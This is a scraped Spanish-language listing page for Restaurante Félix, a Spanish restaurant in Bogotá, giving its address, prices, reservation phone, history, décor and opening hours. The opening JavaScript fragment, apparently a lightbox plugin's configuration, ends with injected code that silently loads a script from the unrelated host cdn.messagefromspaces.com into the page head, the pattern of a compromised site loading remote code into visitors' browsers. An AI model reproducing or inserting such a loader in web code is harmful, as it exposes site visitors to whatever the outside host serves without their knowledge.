, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Félix

Dirección: Avenida Jiménez #4 -80
Zona:
Centro
Precio Promedio Plato por Persona: 
Entre 20.000  y  30.000 pesos
Formas de Pago:  
Recibe Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Para reservar ONLINE haga click en:

RESERVAR AHORA EN EL RESTAURANTE FÉLIX

————————————————————————————————————————————–

Categoría: Español

Es un restaurante Español de gran trayectoria en Bogotá fundado en 1940 por Don Félix Rodríguez, que trajo de sus tierras españolas los mejores platos tradicionales.

Si a usted le gusta la comida española, disfrutar de sus corridas, su música y en especial de la fiesta brava, este es el lugar perfecto. Además por sus luces bajas y los toques florales es ideal para el romance.

Su ambiente hace que se sienta como en España, no es sólo el olor a paella, sino también la decoración que va desde una gran cabeza de toro a la entrada hasta los pequeños detalles como los claveles rojos. Cuenta con servicio a domicilio para comodidad de sus clientes.

Horario:
Lunes a Sabado 12:00 m – 5:30 p.m

Parqueaderos Cercanos:
Calle 16 con carrera 3
Calle 14 #5-14
Calle 14 #5-40

Comedor

Plato


Deja un comentario